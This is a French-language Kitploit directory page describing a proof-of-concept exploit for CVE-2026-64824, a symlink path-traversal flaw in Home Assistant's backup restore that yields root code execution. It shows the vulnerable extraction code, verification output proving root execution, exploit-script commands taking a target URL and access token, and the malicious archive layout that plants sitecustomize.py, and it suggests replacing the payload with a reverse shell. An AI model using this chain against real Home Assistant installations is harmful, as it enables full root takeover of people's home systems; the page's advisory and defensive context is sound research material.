Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-64824-PoC — CVE-2026-64824 — Traversée de chemin par lien symbolique dans la sauvegarde-restauration de Home Assistant → RCE root. Premier PoC fonctionnel, vérifié sur un vrai HA 2026.5.4 (écrasement de sitecustomize.py). GHSA-cwh8-w64c-4j5h | Kitploit
Outils/GitHubGitHub/boreas37/cve-2026-64824-poc
Sécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebDéveloppement de Charges Utiles
GitHubboreas37/cve-2026-64824-poc

CVE-2026-64824-PoC

CVE-2026-64824 — Traversée de chemin par lien symbolique dans la sauvegarde-restauration de Home Assistant → RCE root. Premier PoC fonctionnel, vérifié sur un vrai HA 2026.5.4 (écrasement de sitecustomize.py). GHSA-cwh8-w64c-4j5h

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
16il y a 20 joursPas encore vérifié

CVE-2026-64824 — Traversée de chemin par lien symbolique lors de la sauvegarde/restauration du cœur Home Assistant → RCE

CVSS 8.4 (Critique) · GHSA-cwh8-w64c-4j5h · CWE-22 / CWE-59

TL;DR

Un attaquant authentifié (administrateur) téléverse une archive tar de sauvegarde falsifiée. Le chemin de restauration extrait le homeassistant.tar.gz interne avec filter="fully_trusted" et ne valide que les noms des membres — jamais les linknames SYMTYPE. Un lien symbolique pointant vers un chemin absolu (par ex. site-packages/ de Python) est honoré, si bien qu'un sitecustomize.py écrit après lui atterrit en dehors du répertoire d'extraction en tant que root (l'image Docker officielle exécute HA en tant que root). Au prochain démarrage de Python, il est auto-importé → RCE en tant que root.

Vérifié (2026-08-10)

✅ Home Assistant Core 2026.5.4 réel (Docker, arm64, Python 3.14.2) :

root@kitploit:~
POST /api/backup/upload?agent_id=backup.local  → 201 {"backup_id": "..."}
websocket backup/restore                      → executed (config replaced)

$ python3 -c 'print(1)'
$ ls -la /tmp/HA_PWNED_64824
-rw-r--r-- 1 root root 130 ... /tmp/HA_PWNED_64824
$ cat /tmp/HA_PWNED_64824
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),...

✅ sitecustomize.py a atterri dans /usr/local/lib/python3.14/site-packages/ (appartenant à root)

✅ Contre-vérification : le tarfile de Python 3.14.5 rejette les liens symboliques absolus (FileExistsError) ; Python 3.14.2 (fourni avec HA 2026.5.x) les extrait — c'est pourquoi les versions plus anciennes sont exploitables. Corrigé dans HA 2026.7.0.

Le bug

homeassistant/backup_restore.py (~v2026.5.x) :

root@kitploit:~
istf.extractall(
    path=Path(tempdir, "homeassistant"),
    members=securetar.secure_path(istf),   # validates member.name only!
    filter="fully_trusted",
)
# ... shutil.copytree(Path(tempdir, "homeassistant", "data"), config_dir, ...)

secure_path() rejette les noms absolus et la traversée .., mais un membre SYMTYPE avec un nom bénin + un linkname absolu passe le filtre tel quel, et fully_trusted indique à tarfile de ne pas le contrôler.

Exploitation

root@kitploit:~
# 1. Build malicious backup from a real HA backup
python3 CVE-2026-64824.py --build --backup real_backup.tar -o evil.tar \
    --link-target /usr/local/lib/python3.14/site-packages/

# 2. Upload + restore (token = long-lived access token)
python3 CVE-2026-64824.py --target http://ha:8123 --token <LLAT> --backup real_backup.tar

Format de sauvegarde (v2, correspond aux vraies sauvegardes HA) :

root@kitploit:~
outer: ./backup.json            {version:2, type:partial, compressed:true, protected:false}
outer: homeassistant.tar.gz
inner: data/evil_link           -> /usr/local/lib/python3.14/site-packages/   (SYMTYPE)
inner: data/evil_link/sitecustomize.py                                       (payload)

Tout démarrage d'un processus Python (redémarrage de HA, python3 ... dans le conteneur) déclenche sitecustomize.py — qui exécute id > /tmp/HA_PWNED_64824 en tant que root. Remplacez la charge utile par un reverse shell pour un contrôle total.

Impact

  • RCE complète en tant que root sur les installations Home Assistant OS/Container
  • La restauration de sauvegarde est accessible à tout administrateur authentifié (et aux utilisateurs disposant d'un accès sauvegarde/restauration), y compris via le flux « Restore backup » de l'interface
  • Comme la restauration remplace d'abord le répertoire de configuration, l'attaque fonctionne également même lorsque la configuration est par ailleurs verrouillée

Correctif

Mettez à niveau vers HA 2026.7.0+ (la restauration utilise désormais un filtre tar strict qui rejette les entrées de liens symboliques sortant du répertoire d'extraction).

Chronologie

  • 2026-07 : vulnérabilité divulguée par VulnCheck, GHSA-cwh8-w64c-4j5h publiée
  • 2026-08-10 : ce PoC — premier exploit public fonctionnel avec vérification complète de la RCE root sur une instance réelle 2026.5.4
  • Aucune exploitation dans la nature observée au moment de la publication

Avertissement

À des fins de recherche et d'éducation uniquement. La vulnérabilité a déjà été divulguée (GHSA-cwh8-w64c-4j5h) et corrigée dans 2026.7.0 ; ce dépôt démontre la chaîne d'exploitation pour les défenseurs et les chercheurs.

Télécharger l’outil